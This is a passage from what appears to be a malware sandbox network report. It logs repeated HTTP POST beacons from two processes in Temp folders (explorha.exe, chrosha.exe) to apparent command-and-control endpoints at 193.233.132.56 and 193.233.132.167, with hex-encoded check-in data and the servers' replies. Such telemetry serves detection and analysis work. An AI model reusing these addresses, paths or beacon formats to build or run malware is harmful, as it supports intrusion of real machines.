                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:04.931333065 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
892 | 192.168.2.5 | 50741 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:04.892939091 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:05.145104885 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
893 | 192.168.2.5 | 50743 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:05.308123112 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:05.562213898 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
894 | 192.168.2.5 | 50744 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:05.506942987 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:05.750025988 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
895 | 192.168.2.5 | 50745 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:05.914108992 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:06.158916950 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
896 | 192.168.2.5 | 50746 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:06.002943993 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:06.251528978 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
897 | 192.168.2.5 | 50747 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:06.409559965 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:06.660788059 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
898 | 192.168.2.5 | 50748 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:06.609671116 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:06.858450890 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:06 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
899 | 192.168.2.5 | 50749 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:07.030046940 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:07.280863047 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
900 | 192.168.2.5 | 50750 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:07.107389927 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:07.354238033 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
901 | 192.168.2.5 | 50751 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:07.539735079 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:07.795268059 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
902 | 192.168.2.5 | 50752 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:07.710942984 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:07.959954023 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:07 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
903 | 192.168.2.5 | 50753 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:08.153892994 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:08.398806095 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
904 | 192.168.2.5 | 50754 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:08.218807936 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:08.475684881 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
905 | 192.168.2.5 | 50755 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:08.650383949 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:08.901345015 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
906 | 192.168.2.5 | 50756 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:08.836236954 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:09.086503029 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:08 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
907 | 192.168.2.5 | 50757 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:09.257383108 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:34:09.498687029 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
908 | 192.168.2.5 | 50758 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:09.350935936 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:34:09.602930069 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
909 | 192.168.2.5 | 50759 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:34:09.752937078 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:34:10.004782915 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:09 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
910 | 192.168.2.5 | 50760 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
